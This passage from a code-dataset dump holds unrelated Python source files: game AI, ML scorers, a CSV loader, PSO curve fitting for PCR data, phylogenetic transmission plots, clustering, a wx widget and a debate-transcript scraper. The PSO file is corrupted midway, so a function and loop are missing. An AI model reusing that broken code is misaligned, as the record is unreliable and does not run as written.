values are not empty\n        assert all(pid_file_content.values())\n\n        # Check that all ports are found\n        assert all(isinstance(port, int) for port in pid_file_content['ports'].values())\n\n\nif __name__ == '__main__':\n    logging.basicConfig(level=logging.INFO, format=\"%(asctime)s - %(name)s - [%(levelname)-8s] (%(threadName)-10s) %(message)s\")\n    suite = unittest.TestLoader().loadTestsFromTestCase(TestDAQProcess)\n    unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"tests/proc/test_daq_proc.py","file_name":"test_daq_proc.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"486530116","text":"from AI.base_ai import BaseAI\r\nfrom AI.ai_config import *\r\nimport random\r\n\r\nclass TeamAI( BaseAI ):\r\n    def __init__( self , helper ):\r\n        BaseAI.__init__( self , helper )\r\n\r\n    def decide( self ):\r\n        helper = self.helper\r\n        my_pos = helper.getMyPosition()\r\n        my_dir = helper.getMyDirection()\r\n        res = helper.askGodDirection( \"FoodGod\" )\r\n\r\n        if helper.checkMeDead():\r\n            return res\r\n\r\n        nearest_food = helper.getKNearestFood( my_pos , 1 )\r\n        if len( nearest_food ) > 0:\r\n            path_to_food = helper.getShortestPath( my_pos , nearest_food[0] , helper.getMyDirection() )\r\n            if len( path_to_food ) > 0:\r\n                res = path_to_food[0]\r\n        \r\n        while not helper.checkDirection( res ):\r\n            res = helper.askGodDirection( \"FoodGod\" )\r\n\r\n        return res\r\n","sub_path":"Pygame/src/AI/teamEating.py","file_name":"teamEating.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"14477420","text":"import six\nfrom sklearn.metrics import make_scorer\n\nfrom . import (\n    accuracy_score,\n    mean_squared_error,\n    r2_score,\n)\n\n# Scorers\naccuracy_scorer = make_scorer(accuracy_score)\nneg_mean_squared_error_scorer = make_scorer(mean_squared_error,\n                                            greater_is_better=False)\nr2_scorer = make_scorer(r2_score)\n\n\nSCORERS = dict(\n    accuracy=accuracy_scorer,\n    neg_mean_squared_error=neg_mean_squared_error_scorer,\n    r2=r2_scorer,\n)\n\n\ndef get_scorer(scoring, compute=True):\n    \"\"\"Get a scorer from string\n\n    Parameters\n    ----------\n    scoring : str | callable\n        scoring method as string. If callable it is returned as is.\n\n    Returns\n    -------\n    scorer : callable\n        The scorer.\n    \"\"\"\n    # This is the same as sklearns, only we use our SCORERS dict,\n    # and don't have back-compat code\n    if isinstance(scoring, six.string_types):\n        try:\n            scorer = SCORERS[scoring]\n        except KeyError:\n            raise ValueError('{} is not a valid scoring value. 
'\n 'Valid options are {}'.format(scoring,\n sorted(SCORERS)))\n else:\n scorer = scoring\n\n return scorer\n","sub_path":"dask_ml/metrics/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"290682112","text":"import pickle\nfrom constants import Constants\n\nclass Database:\n\n\t@staticmethod\n\tdef get_data():\n\t\tprint(\"Getting Data...\")\n\t\ttrain_x, train_y = Database.get_train_data()\n\t\ttest_x = Database.get_test_data()\n\t\tprint(\"train_x: \" + str(len(train_x)) + \", \" + str(len(train_x[0])) )\n\t\tprint(\"train_y: \" + str(len(train_y)))\n\t\tprint(\"test_x: \" + str(len(test_x)) + \", \" + str(len(test_x[0])) )\n\t\tprint(\"Features: \" + str(Constants.tot_features))\n\t\tprint(\"Labels: \" + str(Constants.tot_labels))\n\t\treturn train_x, train_y, test_x\n\n\t# Returns all the row values of a particular column of train_x i.e values of a particular feature, of all data points\n\t@staticmethod\n\tdef get_feature_data(train_x, col):\n\t\tfeature_data = []\n\t\trow = 0\n\t\twhile(row < len(train_x)):\n\t\t\tfeature_data.append(train_x[row][col])\n\t\t\trow = row+1\n\t\treturn feature_data\n\n\t# data: 1d array, containing the values of a particular feature, of all data points\n\t# It returns a 2d grid, where each row represents, all features belonging to a class label;\n\t# rows are sorted in the ascending order of class labels.\n\t@staticmethod\n\tdef partition_by_class_label(data, train_y):\n\t\tlabel_sorted_2d_array = []\n\t\tcount = 1\n\t\twhile(count <= Constants.tot_labels):\n\t\t\tlabel_sorted_2d_array.append([])\n\t\t\tcount = count+1\n\t\tind = 0\n\t\twhile(ind < len(data)):\n\t\t\tdatum = data[ind]\n\t\t\tlabel = train_y[ind]\n\t\t\tlabel_sorted_2d_array[label].append(datum)\n\t\t\tind = ind+1\n\t\treturn label_sorted_2d_array\n\n\t# It returns a 2D array, where, each row represents, all samples belonging to a class label;\n\t# rows are sorted in the ascending order of class labels.\n\t@staticmethod\n\tdef partition_by_class_label_2d(train_x, train_y):\n\t\tlabel_sorted_2d_array = []\n\t\tcount = 1\n\t\twhile(count <= Constants.tot_labels):\n\t\t\tlabel_sorted_2d_array.append([])\n\t\t\tcount = count+1\n\t\tind = 0\n\t\twhile(ind < len(train_x)):\n\t\t\tfeatures = train_x[ind]\n\t\t\tlabel = train_y[ind]\n\t\t\tlabel_sorted_2d_array[label].append(features)\n\t\t\tind = ind+1\n\t\treturn label_sorted_2d_array\n\n\t@staticmethod\n\tdef get_test_data():\n\t\t# Assumption: Should have label-mapping-file in dataset folder\n\t\ttest_filename = Constants.dataset_base + Constants.test_file\n\t\ttest_file = open(test_filename, \"r\")\n\t\ttest_x = []\n\t\tfor sample in test_file:\n\t\t\tfeature_array = sample.split(Constants.data_separator)\n\t\t\tfeature_array = Database.remove_newline(feature_array)\n\t\t\tfeature_array = Database.get_float_list(feature_array)\n\t\t\ttest_x.append(feature_array)\n\t\ttest_file.close()\n\t\treturn test_x\n\n\t@staticmethod\n\tdef get_train_data():\n\t\ttrain_filename = Constants.dataset_base + Constants.train_file\n\t\ttrain_file = open(train_filename, \"r\")\n\t\ttrain_x = []\n\t\ttrain_y = []\n\t\tlabel_dict = dict()\n\t\tfirst_iter = True\n\t\t# Get Train Data\n\t\tfor sample in train_file:\n\t\t\tfeature_array = sample.split(Constants.data_separator)\n\t\t\t# Note the total no. 
of features\n\t\t\tif(first_iter == True):\n\t\t\t\tfirst_iter = False\n\t\t\t\tConstants.tot_features = len(feature_array)-1\n\t\t\tlast_ind = len(feature_array)-1\n\t\t\tfeature_array = Database.remove_newline(feature_array)\n\t\t\tfeature_part = feature_array[:last_ind]\n\t\t\tlabel_part = feature_array[last_ind]\n\t\t\t# Convert all string-features to floats\n\t\t\tfeature_part = Database.get_float_list(feature_part)\n\t\t\t# Map string-labels to ints\n\t\t\tif(label_dict.get(label_part) == None):\n\t\t\t\tlabel_dict[label_part] = len(label_dict)\n\t\t\tlabel_part = label_dict[label_part]\n\t\t\ttrain_x.append(feature_part)\n\t\t\ttrain_y.append(label_part)\n\t\tlabel_mapping_filename = Constants.dataset_base + Constants.label_mapping_file\n\t\t# Save the Label Mapping\n\t\tDatabase.dump_data(label_mapping_filename, label_dict)\n\t\tDatabase.label_dict = label_dict\n\t\tConstants.tot_labels = len(label_dict)\n\t\ttrain_file.close()\n\t\treturn train_x, train_y\n\n\t@staticmethod\n\tdef dump_data(filename, data):\n\t\tfile = open(filename, \"wb\")\n\t\tpickle.dump(data, file)\n\t\tfile.close()\n\n\t@staticmethod \n\tdef load_data(filename):\n\t\tfile = open(filename, \"rb\")\n\t\tdata = pickle.load(file)\n\t\tfile.close()\n\t\treturn data\n\n\t@staticmethod\n\tdef remove_newline(feature_array):\n\t\tlast_ind = len(feature_array)-1\n\t\tlast_feature_len = len(feature_array[last_ind])\n\t\t# Remove the newline character, if present\n\t\tif(feature_array[last_ind][last_feature_len-1] == \"\\n\"):\n\t\t\tfeature_array[last_ind] = feature_array[last_ind][:last_feature_len-1]\n\t\treturn feature_array\n\n\t@staticmethod\n\tdef get_float_list(lst):\n\t\tind = 0\n\t\twhile(ind < len(lst)):\n\t\t\tlst[ind] = float(lst[ind])\n\t\t\tind = ind+1\n\t\treturn lst\n\n\t# Gives str(label) given int(label)\n\t@staticmethod\n\tdef decode_label(tar_label_int):\n\t\tfor label_str, label_int in Database.label_dict.items():\n\t\t\tif(label_int == tar_label_int):\n\t\t\t\treturn label_str","sub_path":"ass_3/src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"635409436","text":"#\n# Problem: Write a function that finds the index of a rotation point in a \"mostly\" ordered list.\n#\nfrom typing import List\n\n\ndef find_rotation_point(items: List) -> int:\n\t\"\"\"\n\tSolution:\n\tComplexity:\n\t\tTime: O(lg(n)) - Binary search-like algorithm\n\t\tSpace: O(1) - Constant space, just tracking a few ints\n\t\"\"\"\n\tif not items:\n\t\traise ValueError('items must contain at least one value')\n\n\tindex_start = 0\n\tindex_end = len(items) - 1\n\n\t# Covers scenarios where one item is in the list\n\t# or where the first item is the rotation point\n\tif items[index_start] <= items[index_end]:\n\t\treturn 0\n\n\twhile index_start != index_end:\n\t\t# If we've zeroed in on adjacent items, then we know the second is the rotation point\n\t\tif index_start + 1 == index_end:\n\t\t\treturn index_end\n\n\t\tindex_search = int((index_start + index_end) / 2)\n\t\tif items[index_search] < items[0]:\n\t\t\tindex_end = index_search\n\t\telse:\n\t\t\tindex_start = index_search\n\n\treturn index_start\n","sub_path":"problems/ic_find_rotation_point.py","file_name":"ic_find_rotation_point.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"597589144","text":"import numpy as np\r\nfrom decimal import 
Decimal\r\nfrom pyswarm import pso\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport csv\r\nimport sys\r\n\r\nprint('CPCR Curve fitting')\r\nprint(' the function is a+b*x+c/((1+math.exp(-d*(x-e)))*(1+math.exp(-f*(x-g))))')\r\nprint(' the program use pso to optimze the parameter of fuction above')\r\n# caculate mean of the data of experiment \r\ndef caculatemean(arg,size):\r\n sum=0.0\r\n for i in xrange(size):\r\n sum=sum+arg[i]\r\n return sum/size\r\n#caculate the predict data using function \r\ndef caculate(x,parameters):\r\n a,b,c,d,e,f,g=parameters\r\n return a+b*x+c/((1+math.exp(-d*(x-e)))*(1+math.exp(-f*(x-g))))\r\n# score function R-score=-1+SSE/SST\r\ndef myfunction(parameters,*args):\r\n a,b,c,d,e,f,g=parameters\r\n y=args\r\n SSE=0.0\r\n size=len(y)\r\n parametersSize=len(parameters)\r\n for i in xrange(size):\r\n yi=caculate(i+1,parameters)\r\n SSE=SSE+math.pow((y[i]-yi),2)\r\n meanvalue=caculatemean(args,size)\r\n SST=0.0\r\n for i in xrange(size):\r\n SST=SST+math.pow((y[i]-meanvalue),2)\r\n if SST==0:\r\n print('warning the SST maybe be zero')\r\n SS=1-SSE/SST\r\n return (SSE/SST)-1 #R-score\r\n #return (parametersSize/(size-parametersSize-1))*(1-SS)-SS #adjust R-score\r\n #return SSE\r\n# prepare the csv format data of experiment\r\ndef readfile(filename):\r\n rows=[]\r\n with open(filename) as f:\r\n f_csv=csv.reader(f)\r\n headers=next(f_csv)\r\n for row in f_csv:\r\n if row:\r\n rows.append(row)\r\n return np.array(np.transpose(rows),dtype=float)\r\n#caculate average of all number to shutdown the number \r\ndef caculatemidnum(data):\r\n sum=0.0\r\n length=len(data)\r\n for itera in data:\r\n sum=sum+(itera)\r\n return sum/(length*60)\r\n#caculate Maxnum num in every col\r\n'''def caculateMaxNum(data):\r\n max=0\r\n for itera in data:\r\n if itera>max:\r\n max=itera\r\n return max/60.0'''\r\n# produce iterations of pso according to the pcr data infomation\r\ndef constraint(data,length):\r\n sum=200\r\n for itera in xrange(1,length):\r\n if data[itera]0:\r\n file_result=open('result.txt','w')\r\n file_result.write(repr('para_a').rjust(10)+repr('para_b').rjust(10)+repr('para_c').rjust(10)+repr('para_d').rjust(10)+repr('para_e').rjust(10)+repr('para_f').rjust(10)+repr('para_g').rjust(10)+repr('error').rjust(10)+'\\n')\r\n for rownum in xrange(row):\r\n '''print data[rownum].min()\r\n print data[rownum].max()\r\n print data[rownum].mean()'''\r\n args=data[rownum]\r\n length=len(args)\r\n iteration=constraint(args,length)\r\n print('iterations={}'.format(iteration))\r\n print(\"please wait a moment....\")\r\n minNum=args.min()\r\n maxNum=args.max()\r\n meanNum=args.mean()\r\n lb=[-maxNum,0,-meanNum,-1,-maxNum,-1,-maxNum]\r\n ub=[1,0.5,maxNum,1.1,maxNum+meanNum,1.1,maxNum+meanNum]\r\n initialData=[0,0.01,meanNum,-1,maxNum,0.7,maxNum]\r\n initialData2=[minNum,0.03,meanNum+4,0.1,maxNum,-1,maxNum] \r\n xopt4,fopt4=pso(myfunction,lb,ub,args=args,initialData=initialData,initialData2=initialData2,swarmsize=250,maxiter=iteration)\r\n print('The optimum is at:')\r\n print(' {}'.format(xopt4))\r\n print('Optimal function values:')\r\n #print(' R-square : {}'.format(fopt4))\r\n print('ajusted R-squared:{}'.format(-fopt4)) \r\n file_result.write(repr(xopt4[0]).rjust(10)+repr(xopt4[1]).rjust(10)+repr(xopt4[2]).rjust(10)+repr(xopt4[3]).rjust(10)+repr(xopt4[4]).rjust(10)+repr(xopt4[5]).rjust(10)+repr(xopt4[6]).rjust(10)+repr(fopt4).rjust(10)+'\\n')\r\n x=np.linspace(1,length,10000)\r\n 
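# evaluate the fitted double-sigmoid model on a dense grid for plotting\r\n    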
y=xopt4[0]+xopt4[1]*x+xopt4[2]/((1+np.exp(-xopt4[3]*(x-xopt4[4])))*(1+np.exp(-xopt4[5]*(x-xopt4[6]))))\r\n plt.figure(rownum)\r\n for i in xrange(length):\r\n plt.plot(i+1,args[i],'blue',linestyle='dashed',marker='.')\r\n plt.plot(x,y,'r',linewidth=2)\r\n plt.xlabel(\"circle(Time)\")\r\n plt.ylabel(\"fluorescence\")\r\n plt.legend()\r\n plt.show()\r\n if row>0:\r\n file_result.close()\r\nif __name__==\"__main__\":\r\n main()\r\n\r\n\r\n \r\n","sub_path":"pso_general_new.py","file_name":"pso_general_new.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"479296986","text":"import logging\nimport os\nfrom collections import Counter, defaultdict\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom matplotlib.pyplot import bar, plot, xlim, xlabel, ylabel, legend, show, ylim, figure, savefig\nfrom pastml.tree import read_tree, DATE, annotate_dates\nfrom pastml.visualisation.cytoscape_manager import save_as_transition_html\n\nDATE_STEP = 10\n\nEXT_COLOR = '#4daf4a'\nHIGH_COLOR = '#e41a1c'\nLOW_COLOR = '#377eb8'\n\nstate2color = {'High': HIGH_COLOR, 'External': EXT_COLOR, 'Low': LOW_COLOR}\n\n\ndef count_transmissions(tree, mp_df, filter=lambda _: True):\n states = mp_df.columns\n from_to2count = Counter()\n for n in tree.traverse():\n if not filter(n):\n continue\n for n_state in states:\n same_state_count = 0\n for c in n.children:\n for c_state in states:\n prob = mp_df.loc[n.name, n_state] * mp_df.loc[c.name, c_state]\n from_to2count[(n_state, c_state)] += prob\n if n_state == c_state:\n same_state_count += prob\n old_v = from_to2count[(n_state, n_state)]\n from_to2count[(n_state, n_state)] -= min(mp_df.loc[n.name, n_state], same_state_count)\n if from_to2count[(n_state, n_state)] < 0:\n print(old_v, from_to2count[(n_state, n_state)], mp_df.loc[n.name, n_state], same_state_count)\n return from_to2count\n\n\nif '__main__' == __name__:\n\n logging.basicConfig(level=logging.INFO, format='%(asctime)s: %(message)s', datefmt=\"%Y-%m-%d %H:%M:%S\",\n filename=None)\n import argparse\n\n data_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), '../..', 'data')\n\n parser = argparse.ArgumentParser(description=\"Visualises PastML stats.\")\n\n parser.add_argument('--column', default='highlow_prevalence', required=True,\n type=str, help=\"the column of interest.\")\n parser.add_argument('--trees', default=os.path.join(data_dir, \"rep_*\"),\n type=str, help=\"the PASTML trees.\", nargs='+')\n parser.add_argument('--mps', default=os.path.join(data_dir, \"rep_*\"),\n type=str, help=\"the PASTML marginal probability files.\", nargs='+')\n parser.add_argument('--labels', type=str, help=\"the PASTML tree labels.\", nargs='+')\n parser.add_argument('--table', default=os.path.join(data_dir, \"table.xlsx\"), type=str, required=True,\n help=\"Who infected whom table.\")\n parser.add_argument('--out_html', default=os.path.join(data_dir, \"transitions_{}.html\"), type=str, required=True,\n help=\"Who infected whom visualisation.\")\n\n params = parser.parse_args()\n\n forest = []\n for nwk in params.trees:\n tree = read_tree(nwk, columns=[params.column])\n annotate_dates([tree])\n forest.append(tree)\n\n # Who infected whom\n with pd.ExcelWriter(params.table, engine='xlsxwriter') as writer:\n workbook = writer.book\n for label, tree, mp in zip(params.labels, forest, params.mps):\n mp_df = pd.read_csv(mp, sep='\\t', index_col=0)\n states = mp_df.columns\n\n 
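# scan the tips to establish the sampling-year range and per-decade state counts\n            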
min_year, max_year = np.inf, -np.inf\n\n year2state_counts = defaultdict(Counter)\n state_counts = Counter()\n for tip in tree:\n year = int(getattr(tip, DATE))\n if min_year > year:\n min_year = year\n if max_year < year:\n max_year = year\n year //= DATE_STEP\n for state in states:\n mp = mp_df.loc[tip.name, state]\n state_counts[state] += mp\n year2state_counts[year][state] += mp\n\n state_df = pd.DataFrame(index=states, columns=['samples'], data=[[state_counts[s]] for s in states])\n total_counts = state_df['samples'].sum()\n state_df['%'] = 100 * state_df['samples'] / total_counts\n state_df.to_excel(writer, sheet_name='{} tip states'.format(label), startrow=0, startcol=0, float_format='%.0f')\n\n transmission2counts = count_transmissions(tree, mp_df)\n\n df = pd.DataFrame(columns=states, index=states)\n\n for (from_state, to_state), count in transmission2counts.items():\n df.loc[from_state, to_state] = count\n\n total_transitions = df.sum().sum()\n for s in states:\n percentage_s = '% of {}'.format(s)\n df[percentage_s] = 0\n df.loc[percentage_s, percentage_s] = 0\n for state in states:\n df['% of {}'.format(state)] = 100 * df.loc[states, state] / df.loc[states, state].sum(skipna=True)\n df.loc['% of {}'.format(state), states] \\\n = 100 * df.loc[state, states] / df.loc[state, states].sum(skipna=True)\n df.loc[['% of {}'.format(s) for s in states], '% of {}'.format(state)] \\\n = (100 * df.loc[states, state] / total_transitions).tolist()\n\n print(df)\n\n df.to_excel(writer, sheet_name='{} transmissions'.format(label), startrow=0, startcol=0,\n index_label='From \\\\ To', float_format='%.0f')\n\n counts = np.round(np.array(state_df['%'], dtype=float), 1)\n transitions = np.round(\n np.array(df.loc[['% of {}'.format(s) for s in states], ['% of {}'.format(s) for s in states]],\n dtype=float), 0)\n save_as_transition_html(params.column, states, counts=counts,\n transitions=transitions,\n out_html=params.out_html.format(label, min_year, max_year),\n state2colour=state2color, work_dir=None,\n local_css_js=False, threshold=0)\n\n # year2count_array = {}\n # year2transmission_array = {}\n n = len(states)\n years = sorted(set((int(getattr(n, DATE))) // DATE_STEP for n in tree.traverse()))\n n_years = len(years)\n count_array = np.zeros(n * n_years, dtype=float)\n transmission_array = np.zeros((n * n_years, n * n_years), dtype=float)\n state_labels = []\n for year_i, year in enumerate(years):\n for s in states:\n suffixed_s = '{}, {}s'.format(s, year * DATE_STEP)\n state_labels.append(suffixed_s)\n state2color[suffixed_s] = state2color[s]\n\n state_counts = year2state_counts[year]\n # total_counts = sum(state_counts.values())\n count_array[year_i * n: (year_i + 1) * n] = [state_counts[s] for s in states]\n # year2count_array[year] = np.array([state_counts[s] for s in states], dtype=float)\n\n y_transmission2counts = count_transmissions(tree, mp_df,\n filter=lambda n: year == (int(getattr(n, DATE))) // DATE_STEP)\n a = np.zeros((n, n), dtype=float)\n for i in range(n):\n i_state = states[i]\n a[i, i] = y_transmission2counts[(i_state, i_state)]\n for j in range(0, i):\n j_state = states[j]\n a[i, j] = y_transmission2counts[(i_state, j_state)]\n a[j, i] = y_transmission2counts[(j_state, i_state)]\n # total_transitions = a.sum()\n transmission_array[year_i * n: (year_i + 1) * n, year_i * n: (year_i + 1) * n] = a\n # year2transmission_array[year] = a\n\n count_array = 100 * count_array / total_counts\n transmission_array = 100. 
* transmission_array / total_transitions\n\n counts = np.round(count_array, 1)\n transitions = np.round(transmission_array, 0)\n if np.any(transitions > 0):\n save_as_transition_html(params.column, state_labels, counts=counts,\n transitions=transitions,\n out_html=params.out_html.format(label, 'by', DATE_STEP),\n state2colour=state2color, work_dir=None,\n local_css_js=False, threshold=0)\n\n logging.info('Analysed who infected whom in {}'.format(label))","sub_path":"snakemake/py/vis_transmissions.py","file_name":"vis_transmissions.py","file_ext":"py","file_size_in_byte":8518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"230008709","text":"import numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom pandas import ExcelWriter\r\nimport xlrd\r\nfrom scipy.cluster.hierarchy import fcluster\r\nfrom scipy.cluster.hierarchy import linkage\r\nfrom scipy.cluster.hierarchy import dendrogram\r\n \r\nsns.set(style=\"white\")\r\nplt.rcParams[\"font.family\"] = 'HYSinMyeongJo-Medium'\r\nplt.rcParams[\"font.size\"] = 12\r\n\r\ndef fancy_dendrogram(*args, **kwargs):\r\n max_d = kwargs.pop('max_d', None)\r\n if max_d and 'color_threshold' not in kwargs:\r\n kwargs['color_threshold'] = max_d\r\n annotate_above = kwargs.pop('annotate_above', 0)\r\n\r\n ddata = dendrogram(*args, **kwargs)\r\n\r\n if not kwargs.get('no_plot', False):\r\n plt.title('Hierarchical Clustering Dendrogram (truncated)')\r\n plt.ylabel('distance')\r\n for i, d, c in zip(ddata['icoord'], ddata['dcoord'], ddata['color_list']):\r\n x = 0.5 * sum(i[1:3])\r\n y = d[1]\r\n if y > annotate_above:\r\n plt.plot(x, y, 'o', c=c)\r\n plt.annotate(\"%.3g\" % y, (x, y), xytext=(0, -5),\r\n textcoords='offset points',\r\n va='top', ha='center')\r\n if max_d:\r\n plt.axhline(y=max_d, c='k')\r\n return ddata\r\n\r\ndef clustering():\r\n predict = pd.DataFrame(fcluster(row_clusters,1.5,criterion='distance'),data.index)\r\n predict.columns=['predict']\r\n cluster=predict['predict'].values.tolist()\r\n n_cluster=max(cluster)\r\n \r\n for i in range(n_cluster):\r\n print('Cluster %i: %s' % ((i+1), ','.join(predict.index[predict['predict']==i+1].tolist())))\r\n\t\r\n return predict\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n data = 1-abs(round(pd.read_excel('C:/Users/user/Desktop/150x150.xlsx'),4))\r\n labels = data.index\r\n row_clusters = linkage(data, method='complete')\r\n row_clusters = pd.DataFrame(row_clusters,columns=['클러스터ID_1','클러스터ID_2', '거리', '클러스터 멤버수'],index=['클러스터 %d' %(i+1) for i in range(row_clusters.shape[0])])\r\n fancy_dendrogram(row_clusters, labels = labels, max_d=1.5)\r\n clustering()\r\n plt.tight_layout()\r\n plt.ylabel('height')\r\n plt.show()\r\n","sub_path":"code/cluster_ver2.py","file_name":"cluster_ver2.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"524037827","text":"import wx\nfrom Colours import Colours\n\n\nclass DialogBox(wx.TextCtrl):\n \"\"\"\n This class represents the dialog box of the gui.\n \"\"\"\n\n def __init__(self, parent):\n\n wx.TextCtrl.__init__(self, parent=parent, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.VSCROLL)\n\n self.SetBackgroundColour(Colours.dialog_box)\n\n sizer = wx.BoxSizer()\n\n sizer.Add(self, 1, wx.ALIGN_BOTTOM | wx.RIGHT | wx.LEFT)\n\n parent.SetSizer(sizer)\n\n self.font = wx.Font(20, wx.DEFAULT, wx.NORMAL, wx.BOLD)\n\n self.SetFont(self.font)\n\n 
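# render the dialog text in red\n        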
self.SetForegroundColour(wx.RED)\n\n def update_text(self, message):\n\n content_relevant = self.content_relevant(message)\n\n if content_relevant:\n\n self.SetValue(message)\n\n def content_relevant(self, message):\n \"\"\"\n The function checks if the received content is relevant.\n \"\"\"\n\n if message == \"The server has finished executing your request. If you are convinced that your request\" + \\\n \" was not completed, talk to your manager.\" and \"There are only: \" in self.GetValue() \\\n and \"executors that can execute your current request.\" in self.GetValue():\n\n return False\n\n return True","sub_path":"Project/Code/Client/client1/DialogBox.py","file_name":"DialogBox.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"73350563","text":"def displayr(no):\r\n if no !=0: #recursive call\r\n print(\"\",no)\r\n no= no -1\r\n displayr(no)\r\n\r\ndef main():\r\n print(\"Enter the number of times you want to print *\")\r\n value = int(input())\r\n displayr(value)\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"assignment5/assignment5_3.py","file_name":"assignment5_3.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"498291948","text":"import csv\r\n\r\ndef balance():\r\n with open(\"Finances.csv\") as r:\r\n sheetReader = csv.reader(r)\r\n loops = 0\r\n for row in sheetReader:\r\n # Empty lines are boring, who needs 'em\r\n if row == []:\r\n continue\r\n # Gets overwritten each loop, so it saves the last value\r\n lastrow = row\r\n loops += 1\r\n if loops <= 1:\r\n # If there are only 1-2 rows, the sheet is empty.\r\n print(\"Please input a starting balance first.\")\r\n return\r\n # Data corruption isn't fun\r\n r.close()\r\n\r\n print('''\r\n Savings Balance: {}\r\n checking Balance: {}\r\n Cash Balance: {}\r\n\r\n Total Balance: {}\r\n '''.format(lastrow[5], lastrow[6], lastrow[7], lastrow[8]))\r\n","sub_path":"commands/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"411343383","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\n# Download transcripts of the GOP debates from the 2016 election\n\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport os\nimport re\nimport pandas as pd\nimport numpy as np\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\ntranscript_directory = 'markov_transcripts'\n\n\ndef _get_debate_dataframe(url='http://www.presidency.ucsb.edu/debates.php'):\n # Get the table of all presidential debates from\n # http://www.presidency.ucsb.edu\n \n # Scrape the HTML\n session = requests.Session()\n html = session.get(url)\n soup = bs(html.text, 'lxml')\n \n \n # Find the table-data cells with debate information\n docdate = soup.find_all('td', attrs={'class':'docdate'})\n doctext = soup.find_all('td', attrs={'class':'doctext'})\n\n \n # Clean and put the cells into a dataframe\n dates = map(lambda x: x.get_text().strip(), docdate)\n dates = filter(lambda x: x != '', dates)\n\n titles = map(lambda x: re.sub(r\"\"\"\\s+\"\"\", ' ', x.get_text()).strip(), doctext)\n\n urls = map(lambda x: x.find('a', href=True)['href'] \n if hasattr(x.find('a', href=True), '__getitem__') else '', \n doctext)\n\n debate_data = pd.DataFrame({'date': dates, \n 'title': titles, \n 'url': urls})\n \n \n # Clean up 
dataframe formatting and columns\n debate_data['date'] = pd.to_datetime(debate_data.date)\n debate_data['year'] = debate_data.date.apply(lambda x: x.year)\n\n debate_data['primary'] = ( debate_data\n .title\n .str\n .extract(r\"\"\"(Democratic|Republican)\"\"\", expand=False)\n .fillna('')\n )\n \n return debate_data\n\n\n\ndef _get_gop_primaries(debate_data):\n # Extract just this election's GOP primary data, remove undercard debates\n \n mask = ( (debate_data.year > 2012) & \n (debate_data.primary == 'Republican') &\n (debate_data.title.str.contains('Undercard').pipe(np.invert))\n )\n\n gop_primary_data = debate_data.loc[mask]\n \n return gop_primary_data\n\n\n\ndef _get_debate_text(url):\n # Get transcript of a debate based on url\n \n # Scrape the HTML\n session = requests.Session()\n html = session.get(url)\n soup = bs(html.text, 'lxml')\n\n # The debate text is in a span of class displaytext\n debate_text = soup.find('span', attrs={'class':'displaytext'}).text.encode('utf-8').strip()\n \n return debate_text\n\n\n\ndef _write_transcript_to_file(filename, text, directory=transcript_directory):\n # Write the text of a debate transcript to a file\n \n if not os.path.exists(directory):\n os.mkdir(directory)\n \n # Save a string to a file\n \n filepath = '{}/{}'.format(directory,filename)\n with open(filepath, 'w') as fh:\n fh.write(text)\n \n return\n\n\n\ndef download_debate_data():\n # Wrapper function to determine urls for debate transcripts and download all to a file\n\n print('Scraping data...')\n\n # Get the dataframe of GOP debates from this year\n debate_data = _get_debate_dataframe()\n gop_primary_data = _get_gop_primaries(debate_data)\n\n\n # Create a filename to save the transcript text to\n gop_primary_data['filename'] = gop_primary_data.date.dt.strftime('%Y_%m_%d') + '_gop_debate.txt'\n\n\n # Scrape the corresponding URL for the transcript\n gop_primary_data['transcript'] = gop_primary_data.url.apply(lambda x: _get_debate_text(x))\n\n print('Writing data...')\n\n # Write the transcripts to files\n _ = gop_primary_data.apply(lambda x: _write_transcript_to_file(x.filename, x.transcript), axis=1)\n\n print('...Done.')\n\n return\n\n","sub_path":"python/markov_text_download.py","file_name":"markov_text_download.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"244644995","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom collections import OrderedDict\nfrom datetime import datetime, time\nfrom dateutil.tz import tzlocal\nfrom slugify import slugify\nfrom xml.etree import ElementTree\n\nfrom .filters import *\nfrom .transforms import *\n\nimport codecs\nimport dateutil.parser\nimport os\nimport re\nimport yaml\n\n\nclass Recipe(object):\n\n \"\"\"A series of steps to filter/transform content for a resource.\n 